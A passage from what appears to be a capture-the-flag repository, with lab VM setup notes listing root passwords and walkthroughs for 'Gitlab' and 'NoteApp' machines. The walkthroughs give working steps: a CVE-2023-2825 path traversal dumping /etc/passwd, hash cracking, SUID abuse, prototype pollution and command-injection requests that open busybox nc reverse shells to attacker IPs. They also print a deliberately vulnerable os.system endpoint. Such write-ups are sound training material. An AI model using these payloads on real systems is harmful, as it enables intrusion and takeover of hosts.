00:0c:29:c7:d8:5e VMware, Inc. 22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc. 23 | 24 | 4 packets received by filter, 0 packets dropped by kernel 25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded 26 | 27 | ┌──(kali㉿kali)-[~] 28 | └─$ ssh root@192.168.121.129 29 | root@192.168.121.129's password: 30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64) 31 | 32 | * Documentation: https://help.ubuntu.com 33 | * Management: https://landscape.canonical.com 34 | * Support: https://ubuntu.com/advantage 35 | 36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 37 | just raised the bar for easy, resilient and secure K8s cluster deployment. 38 | 39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge 40 | 41 | * Canonical Livepatch is available for installation. 42 | - Reduce system reboots and improve kernel security. Activate at: 43 | https://ubuntu.com/livepatch 44 | 45 | 74 packages can be updated. 46 | 28 updates are security updates. 47 | 48 | New release '20.04.6 LTS' available. 49 | Run 'do-release-upgrade' to upgrade to it. 50 | 51 | Your Hardware Enablement Stack (HWE) is supported until April 2023. 52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128 53 | root@shimishao:~# 54 | ``` 55 | 56 | 57 | 6. If something goes wrong, use the credentials provided below to access the machine. 58 | 59 | # Credentials 60 | ``` 61 | root:1a@S3d$FZ 62 | ``` 63 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Gitlab/Walkthrough.md: -------------------------------------------------------------------------------- 1 | # Gitlab 2 | 3 | ## High Level Overview 4 | 5 | GitLab is a high-level Linux machine with several vulnerabilities that, when combined, grant us root access to the system. Upon checking the robots.txt file in the website, We find a list of password credentials in which these can be used to brute force the login page as a root user. From there, we discover a vulnerable GitLab Version 16.0.0 to Arbitrary File Read. After that we can view the /etc/passwd file in which it contains the hash of the plumber user. After brute forcing this hash via using `john` tool, we find the password and connect to this host via SSH. We make use of misconfigured pax to read the app.file in the root folder. Then we generate a specific CURL request to obtain an elevated shell. 6 | 7 | # Recon 8 | 9 | NMAP finds 2 open TCP port, SSH and HTTPS. 10 | 11 | ![https://i.ibb.co/jHLqK8r/Nmap.png](https://i.ibb.co/jHLqK8r/Nmap.png) 12 | 13 | ## Site 14 | 15 | It appears that the website is utilizing Gitlab Enterprise Edition. 16 | 17 | ![https://i.ibb.co/tMFYjKF/Sign-in-Page.png](https://i.ibb.co/tMFYjKF/Sign-in-Page.png) 18 | 19 | Let’s enumerate the hidden files and folders with `Gobuster`. 20 | 21 | ![https://i.ibb.co/YDwSLGb/Gobuster.png](https://i.ibb.co/YDwSLGb/Gobuster.png) 22 | 23 | It seems there is a robots.txt file available in the website and probably contains password credential to log in. 24 | 25 | ![https://i.ibb.co/p39qHzw/Robots-txt.png](https://i.ibb.co/p39qHzw/Robots-txt.png) 26 | 27 | The default user for GitLab Enterprise Edition is root. 28 | 29 | Let’s use BurpSuite to brute force the user. 30 | 31 | ![https://i.ibb.co/QHRx7Fg/Root-Password.png](https://i.ibb.co/QHRx7Fg/Root-Password.png) 32 | 33 | We found the credentials for the root user in GitLab. 34 | 35 | When enumerating the GitLab Version that is available in the help menu. 36 | 37 | ![https://i.ibb.co/0Jkm4Gn/Gitlab-Version.png](https://i.ibb.co/0Jkm4Gn/Gitlab-Version.png) 38 | 39 | GitLab 16.0.0 is vulnerable to Path Traversal and the associated CVE is CVE-2023-2825. 40 | 41 | The POC can be found here: 42 | 43 | [https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py](https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py) 44 | 45 | Let’s change username, password and the endpoint inside this script before executing this script. 46 | 47 | ```jsx 48 | ENDPOINT = "https://gitlab.icsd" 49 | USERNAME = "root" 50 | PASSWORD = "Shadow123123" 51 | ``` 52 | 53 | The result of the python script: 54 | 55 | ```jsx 56 | ─# python3 poc.py 57 | [*] Attempting to login... 58 | [*] Login successful as user 'root' 59 | [*] Creating 11 groups with prefix 469 60 | [*] Created group '469-1' 61 | [*] Created group '469-2' 62 | [*] Created group '469-3' 63 | [*] Created group '469-4' 64 | [*] Created group '469-5' 65 | [*] Created group '469-6' 66 | [*] Created group '469-7' 67 | [*] Created group '469-8' 68 | [*] Created group '469-9' 69 | [*] Created group '469-10' 70 | [*] Created group '469-11' 71 | [*] Created public repo '/469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825' 72 | [*] Uploaded file '/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f/file' 73 | [*] Executing exploit, fetching file '/etc/passwd': GET - //469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 74 | 75 | root:x:0:0:root:/root:/bin/bash 76 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 77 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 78 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 79 | sync:x:4:65534:sync:/bin:/bin/sync 80 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 81 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 82 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 83 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 84 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 85 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 86 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 87 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 88 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 89 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 90 | irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin 91 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 92 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 93 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 94 | systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 95 | systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin 96 | messagebus:x:103:104::/nonexistent:/usr/sbin/nologin 97 | systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin 98 | pollinate:x:105:1::/var/cache/pollinate:/bin/false 99 | sshd:x:106:65534::/run/sshd:/usr/sbin/nologin 100 | syslog:x:107:113::/home/syslog:/usr/sbin/nologin 101 | uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin 102 | tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin 103 | tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false 104 | landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin 105 | fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin 106 | usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin 107 | plumber:$y$j9T$Q60srmF7j7UmqQhxTU2/p.$x2mfeh7AqyZr2sAcIT9LTXTEhVIbJ3Oians4wDJdin/:1000:1000:plumber:/home/plumber:/bin/bash 108 | lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false 109 | gitlab-www:x:998:999::/var/opt/gitlab/nginx:/bin/false 110 | git:x:997:998::/var/opt/gitlab:/bin/sh 111 | gitlab-redis:x:996:997::/var/opt/gitlab/redis:/bin/false 112 | gitlab-psql:x:995:996::/var/opt/gitlab/postgresql:/bin/sh 113 | registry:x:994:995::/var/opt/gitlab/registry:/bin/sh 114 | ``` 115 | 116 | It seems the hash of the plumber user is available in the `/etc/passwd` file. Let’s brute force this with the following `john` command. 117 | 118 | ```jsx 119 | john --format=crypt hash.txt 120 | ``` 121 | 122 | ![https://i.ibb.co/18jP5w1/password-found.png](https://i.ibb.co/18jP5w1/password-found.png) 123 | 124 | Using this credentials, we can SSH into the “plumber” user. 125 | 126 | ![https://i.ibb.co/5Fzy4D5/SSH-TO-PLUMBER.png](https://i.ibb.co/5Fzy4D5/SSH-TO-PLUMBER.png) 127 | 128 | Let’s look at the Listening Ports via using the following command. 129 | 130 | ```jsx 131 | netstat -tulnp 132 | ``` 133 | 134 | ![https://i.ibb.co/y403JCB/netstat-tools.png](https://i.ibb.co/y403JCB/netstat-tools.png) 135 | 136 | Let’s send a CURL request. 137 | 138 | ```jsx 139 | plumber@plumber:~$ curl 127.0.0.1:10080 140 | Cannot resolve GET request 141 | plumber@plumber:~$ 142 | ``` 143 | 144 | Let’s change the HTTP Method (POST) for this. 145 | 146 | ```jsx 147 | plumber@plumber:~$ curl -XPOST 127.0.0.1:10080 148 | 149 | 150 | 151 | TypeError: expected str, bytes or os.PathLike object, not NoneType 152 | ..... 153 | SHORTENED 154 | ..... 155 | <div class="plain"> 156 | <p> 157 | This is the Copy/Paste friendly version of the traceback. 158 | </p> 159 | <textarea cols="50" rows="10" name="code" readonly>Traceback (most recent call last): 160 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__ 161 | return self.wsgi_app(environ, start_response) 162 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app 163 | response = self.handle_exception(e) 164 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app 165 | response = self.full_dispatch_request() 166 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request 167 | rv = self.handle_user_exception(e) 168 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request 169 | rv = self.dispatch_request() 170 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request 171 | return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) 172 | File "/root/webapp/app.py", line 13, in index 173 | print("User Input:", os.system(user_input)) 174 | TypeError: expected str, bytes or os.PathLike object, not NoneType 175 | </textarea> 176 | </div> 177 | <div class="explanation"> 178 | The debugger caught an exception in your WSGI application. You can now 179 | look at the traceback which led to the error. <span class="nojavascript"> 180 | If you enable JavaScript you can also use additional features such as code 181 | execution (if the evalex feature is enabled), automatic pasting of the 182 | exceptions and much more.</span> 183 | </div> 184 | <div class="footer"> 185 | Brought to you by <strong class="arthur">DON'T PANIC</strong>, your 186 | friendly Werkzeug powered traceback interpreter. 187 | </div> 188 | </div> 189 | 190 | <div class="pin-prompt"> 191 | <div class="inner"> 192 | <h3>Console Locked</h3> 193 | <p> 194 | The console is locked and needs to be unlocked by entering the PIN. 195 | You can find the PIN printed out on the standard output of your 196 | shell that runs the server. 197 | <form> 198 | <p>PIN: 199 | <input type=text name=pin size=14> 200 | <input type=submit name=btn value="Confirm Pin"> 201 | </form> 202 | </div> 203 | </div> 204 | </body> 205 | </html> 206 | 207 | <!-- 208 | 209 | Traceback (most recent call last): 210 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__ 211 | return self.wsgi_app(environ, start_response) 212 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app 213 | response = self.handle_exception(e) 214 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app 215 | response = self.full_dispatch_request() 216 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request 217 | rv = self.handle_user_exception(e) 218 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request 219 | rv = self.dispatch_request() 220 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request 221 | return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) 222 | File "/root/webapp/app.py", line 13, in index 223 | print("User Input:", os.system(user_input)) 224 | TypeError: expected str, bytes or os.PathLike object, not NoneType 225 | 226 | --> 227 | plumber@plumber:~$ 228 | ``` 229 | 230 | There is a file in ‘/root/webapp/app.py’ which is hosting this simple HTTP service. However, we cannot have access to /root folder. 231 | 232 | Enumeration is the key. 233 | 234 | When searching for the SUID files, we found that `pax` command has SUID permission and we can abuse this to read the content of the file. 235 | 236 | ```jsx 237 | LFILE=file_to_read 238 | pax -w "$LFILE" 239 | ``` 240 | 241 | We can view the content of this file through changing the above command. 242 | 243 | ```jsx 244 | plumber@plumber:~$ LFILE="/root/webapp/app.py" 245 | pax -w "$LFILE" 246 | /root/webapp/app.py010064400000000000000000000011111450271307700132670ustar00rootrootfrom flask import Flask, request, render_template 247 | import os 248 | 249 | app = Flask(__name__) 250 | 251 | # Define the route for the home page 252 | @app.route('/', methods=['GET','POST']) 253 | def index(): 254 | if request.method == 'POST': 255 | # Get the user input from the form 256 | user_input = request.form.get('user_input') 257 | # Print the user input to the console 258 | print("User Input:", os.system(user_input)) 259 | elif request.method == 'GET': 260 | return "Cannot resolve GET request" 261 | 262 | # return render_template('index.html') 263 | 264 | if __name__ == '__main__': 265 | app.run(debug=True, port=10080) 266 | plumber@plumber:~$ 267 | ``` 268 | 269 | The following command can be used to get a reverse shell. 270 | 271 | ```jsx 272 | plumber@plumber:~$ curl -XPOST localhost:10080 -d "user_input=busybox nc 192.168.47.128 12342 -e sh" 273 | ``` 274 | 275 | ![https://i.ibb.co/nMqKpjx/last.png](https://i.ibb.co/nMqKpjx/last.png) 276 | 277 | Thank you for Reading!! -------------------------------------------------------------------------------- /Game Of Thrones/Machines/NoteApp/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | 6 | ![Alt text](Screenshots/image-1.png) 7 | 8 | > [!WARNING] 9 | > The images are not supported by virtualbox. 10 | 11 | 3. Choose a Virtual Machine name and location for the new VM. 12 | 4. The default Network Interface is configured as NAT. If not, please do so. 13 | 5. You can find IP address of the machine using arp-scan in your kali machine. 14 | ``` 15 | ┌──(kali㉿kali)-[~] 16 | └─$ sudo arp-scan -l 17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128 18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc. 20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc. 21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc. 22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc. 23 | 24 | 4 packets received by filter, 0 packets dropped by kernel 25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded 26 | 27 | ┌──(kali㉿kali)-[~] 28 | └─$ ssh root@192.168.121.129 29 | root@192.168.121.129's password: 30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64) 31 | 32 | * Documentation: https://help.ubuntu.com 33 | * Management: https://landscape.canonical.com 34 | * Support: https://ubuntu.com/advantage 35 | 36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 37 | just raised the bar for easy, resilient and secure K8s cluster deployment. 38 | 39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge 40 | 41 | * Canonical Livepatch is available for installation. 42 | - Reduce system reboots and improve kernel security. Activate at: 43 | https://ubuntu.com/livepatch 44 | 45 | 74 packages can be updated. 46 | 28 updates are security updates. 47 | 48 | New release '20.04.6 LTS' available. 49 | Run 'do-release-upgrade' to upgrade to it. 50 | 51 | Your Hardware Enablement Stack (HWE) is supported until April 2023. 52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128 53 | root@shimishao:~# 54 | ``` 55 | 56 | 57 | 6. If something goes wrong, use the credentials provided below to access the machine. 58 | 59 | # Credentials 60 | ``` 61 | root:Zold3kMnsn@M1n3 62 | ``` 63 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/NoteApp/Walkthrough.md: -------------------------------------------------------------------------------- 1 | # NoteApp 2 | 3 | ## High Level Overview 4 | 5 | NoteApp is a high-level Linux machine with several vulnerabilities that, when combined, grant us root access to the system. Upon analyzing the source code of the application, We find an interesting functionality in GenerateNoteUrl() function which is a regex checking vulnerability of .replace() method and exploit it to gain access to unreachable hidden internal endpoints. From there, we discover a vulnerable /api/admin/create-admin-user endpoint being vulnerable to Prototype Pollution. After that we create a user with admin privileges and exploit an RCE in /api/admin/delete-profile-photo by simply applying our reverse shell command. After getting a reverse shell as a normal user in the system, we find that rsync is set as SUID bit. We make use of SUID command for this command in GTFOBins and obtain an elevated shell. 6 | 7 | # Recon 8 | 9 | NMAP finds 1 open TCP port, HTTP port 8080. 10 | 11 | ![https://i.ibb.co/bW3Svbh/nmap.png](https://i.ibb.co/bW3Svbh/nmap.png) 12 | 13 | ## Site 14 | 15 | This site reveals its GitHub source code link in ‘/’ endpoint. 16 | 17 | ![https://i.ibb.co/2gnJWVH/project-link.png](https://i.ibb.co/2gnJWVH/project-link.png) 18 | 19 | ![https://i.ibb.co/7Qhb74n/github-dev.png](https://i.ibb.co/7Qhb74n/github-dev.png) 20 | 21 | Through analyzing the source code of the web application, we come across with 2 main services being called ‘Gateway’ and ‘Internal’ in turn. 22 | 23 | The default port for the ‘Internal’ service is only available through local meaning that this is blocked by the local firewall for direct communication. 24 | 25 | ## GitHub Endpoints 26 | 27 | ### /sign-in and /sign-up 28 | 29 | ![https://i.ibb.co/sK1Ykx9/Gateway-Auth-Route.png](https://i.ibb.co/sK1Ykx9/Gateway-Auth-Route.png) 30 | 31 | As its name suggests, the ‘Gateway’ service is acting like a gateway between ‘Internal’ service and the NoteApp User. 32 | 33 | It seems we are able to register and log in to send requests to these endpoints below. 34 | 35 | ![https://i.ibb.co/1dPKRQg/Gateway-User-route.png](https://i.ibb.co/1dPKRQg/Gateway-User-route.png) 36 | 37 | ### Sign-Up request in BurpSuite 38 | 39 | ```bash 40 | POST /sign-up HTTP/1.1 41 | Host: noteapp.icsd:8080 42 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 43 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 44 | Accept-Language: en-US,en;q=0.5 45 | Accept-Encoding: gzip, deflate 46 | Connection: close 47 | Upgrade-Insecure-Requests: 1 48 | Content-Type: application/json 49 | Content-Length: 95 50 | 51 | {"email": "huseyn.aghazada@prosol.az","username":"huseyna12","password":"hehehe12","age": 12 52 | } 53 | ``` 54 | 55 | ![https://i.ibb.co/PDmpYC4/Sign-In-Request.png](https://i.ibb.co/PDmpYC4/Sign-In-Request.png) 56 | 57 | ### Sign-In request in BurpSuite 58 | 59 | ```bash 60 | POST /sign-in HTTP/1.1 61 | Host: noteapp.icsd:8080 62 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 63 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 64 | Accept-Language: en-US,en;q=0.5 65 | Accept-Encoding: gzip, deflate 66 | Connection: close 67 | Upgrade-Insecure-Requests: 1 68 | Content-Type: application/json 69 | Content-Length: 62 70 | 71 | {"email": "huseyn.aghazada@prosol.az","password":"hehehe12" 72 | } 73 | ``` 74 | 75 | ![https://i.ibb.co/zJ8YmsB/Sign-In-Request.png](https://i.ibb.co/zJ8YmsB/Sign-In-Request.png) 76 | 77 | ### GenerateNoteUrl 78 | 79 | This URL Generator function directly uses `.replace()` method of JavaScript. 80 | 81 | ![https://i.ibb.co/YQX1x4N/Gateway-User-Controller-Bypass-Gateway.png](https://i.ibb.co/YQX1x4N/Gateway-User-Controller-Bypass-Gateway.png) 82 | 83 | When we search for `.replace()` method of JS, it can be seen that this method is taking arguments of `RegExp` object along with strings. 84 | 85 | ![https://i.ibb.co/3rQ3Vh3/String-Replace.png](https://i.ibb.co/3rQ3Vh3/String-Replace.png) 86 | 87 | Let’s put these things together. 88 | 89 | ```jsx 90 | const noteUrl = `${base_url}method-user-note/:NoteId:/`; 91 | 92 | const GenerateNoteUrl = (method, NoteId) => { 93 | return noteUrl.replace('method', method).replace(':NoteId:', NoteId); 94 | }; 95 | ``` 96 | 97 | `method` variable in the first `replace()` method cannot directly be abused by the attacker, however, the second `NoteId` is a user input. Therefore, let’s look at the second `.replace()` method. 98 | 99 | As can be seen from this [website](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace), Adding `$’` to the NoteId input, it will cause for the `.replace()` method to add the portion of the string (`/`) that follows the matched substring (`:NoteId:`). 100 | 101 | For simplicity, I used the following node script. 102 | 103 | ```jsx 104 | const noteUrl = 'http://localhost/:8080/get-user-note/:NoteId:/' 105 | USERINPUT = `huseyn$'aghazada` 106 | noteUrl.replace(':NoteId:', USERINPUT); 107 | ``` 108 | 109 | ![https://i.ibb.co/VYgHZbZ/personal-node-for-replace.png](https://i.ibb.co/VYgHZbZ/personal-node-for-replace.png) 110 | 111 | This means that we can send direct requests to hidden `Internal` service endpoints such as `/first_flag` endpoint that I have added. 112 | 113 | ![https://i.ibb.co/5knnnKK/first-flag.png](https://i.ibb.co/5knnnKK/first-flag.png) 114 | 115 | ![https://i.ibb.co/LzGYwGF/Delete-request.png](https://i.ibb.co/LzGYwGF/Delete-request.png) 116 | 117 | After successfully retrieving the first flag, we can go for the second flag. 118 | 119 | Also from the image above in ./internal/app.js file, you can see that with _method=METHOD query, it is possible to override the HTTP method that is sent to the Internal service. 120 | 121 | This is for checking: 122 | 123 | ![https://i.ibb.co/bJ2bS6f/Method-override-checking.png](https://i.ibb.co/bJ2bS6f/Method-override-checking.png) 124 | 125 | We can successfully override the method with *_method* query. 126 | 127 | ### Prototype Pollution 128 | 129 | From the code in `AdminController.js`, we can create an admin user via exploiting prototype pollution. 130 | 131 | ```jsx 132 | exports.CreateAdminUser = (req, res) => { 133 | const errors = validationResult(req); 134 | if (!errors.isEmpty()) { 135 | return res.status(400).json({ errors: errors.array() }); 136 | } 137 | const user = req.body; 138 | 139 | if (user.isAdmin && user.SecretCode !== SecretCode) { 140 | return res.status(401).json({ message: 'No Admin User is created!!!' }); 141 | } 142 | else { 143 | let NewUser = Object.assign(DefaultUser, user); 144 | if (NewUser.isAdmin) { 145 | bcrypt.hash(NewUser.password, 10, (err, hashedPassword) => { 146 | if (err) { 147 | return res.status(500).json({ message: 'Error hashing password' }); 148 | } 149 | 150 | AdminUser.findByUsername(NewUser.username, (existingAdminUserByUsername) => { 151 | if (existingAdminUserByUsername) { 152 | return res.status(400).json({ message: 'Username is already taken' }); 153 | } 154 | AdminUser.create(NewUser.username, hashedPassword, (adminId) => { 155 | return res.status(201).json({ message: 'Admin User is successfully created', adminId }); 156 | }); 157 | }); 158 | }); 159 | } 160 | else { 161 | return res.status(401).json({ message: 'No Admin User is created!!!' }); 162 | } 163 | } 164 | }; 165 | ``` 166 | 167 | In javascript, the arguments in `Object.assign()` is given in wrong order and also there is no any checking via assign the variable `user` into `req.body`. 168 | 169 | ```jsx 170 | PUT /update-user-note/..$'..$'admin$'create-admin-user%3F_method=POSt& HTTP/1.1 171 | Host: noteapp.icsd:8080 172 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 173 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 174 | Accept-Language: en-US,en;q=0.5 175 | Accept-Encoding: gzip, deflate 176 | Connection: close 177 | Upgrade-Insecure-Requests: 1 178 | Content-Type: application/json 179 | Content-Length: 86 180 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo 181 | 182 | { 183 | "username": "admin", 184 | "password":"adminadmin", 185 | "__proto__": { "isAdmin":true 186 | } 187 | } 188 | ``` 189 | 190 | ![https://i.ibb.co/4T2Gdvm/Prototype-pollution-exploit.png](https://i.ibb.co/4T2Gdvm/Prototype-pollution-exploit.png) 191 | 192 | Let’s login as newly created admin user. 193 | 194 | ```jsx 195 | PUT /update-user-note/..$'..$'admin$'login-as-admin%3F_method=POST& HTTP/1.1 196 | Host: noteapp.icsd:8080 197 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 198 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 199 | Accept-Language: en-US,en;q=0.5 200 | Accept-Encoding: gzip, deflate 201 | Connection: close 202 | Upgrade-Insecure-Requests: 1 203 | Content-Type: application/json 204 | Content-Length: 49 205 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo 206 | 207 | { 208 | "username": "admin", 209 | "password":"adminadmin"} 210 | ``` 211 | 212 | ![https://i.ibb.co/d4svqbh/Login-As-Admin.png](https://i.ibb.co/d4svqbh/Login-As-Admin.png) 213 | 214 | Now, we are an admin user. Last thing is to abuse the endpoints that are accessible by admin user. 215 | 216 | ![https://i.ibb.co/25wxJv7/Delete-Profile-Photo.png](https://i.ibb.co/25wxJv7/Delete-Profile-Photo.png) 217 | 218 | It seems we can exploit this by simply sending semicolon and execute our listener command. 219 | 220 | ```jsx 221 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1 222 | Host: noteapp.icsd:8080 223 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 224 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 225 | Accept-Language: en-US,en;q=0.5 226 | Accept-Encoding: gzip, deflate 227 | Connection: close 228 | Upgrade-Insecure-Requests: 1 229 | Content-Type: application/json 230 | Content-Length: 43 231 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo 232 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs 233 | 234 | { 235 | "fileName": "random_file.jpg; whoami" 236 | } 237 | ``` 238 | 239 | ![https://i.ibb.co/pKcp8wN/delete-profile-whoami.png](https://i.ibb.co/pKcp8wN/delete-profile-whoami.png) 240 | 241 | Using `busybox` instead of direct `nc` command seems more opsec for me. 242 | 243 | ```jsx 244 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1 245 | Host: noteapp.icsd:8080 246 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 247 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 248 | Accept-Language: en-US,en;q=0.5 249 | Accept-Encoding: gzip, deflate 250 | Connection: close 251 | Upgrade-Insecure-Requests: 1 252 | Content-Type: application/json 253 | Content-Length: 79 254 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo 255 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs 256 | 257 | { 258 | "fileName": "random_file.jpg; busybox nc 192.168.100.248 53 -e /bin/bash" 259 | } 260 | ``` 261 | 262 | 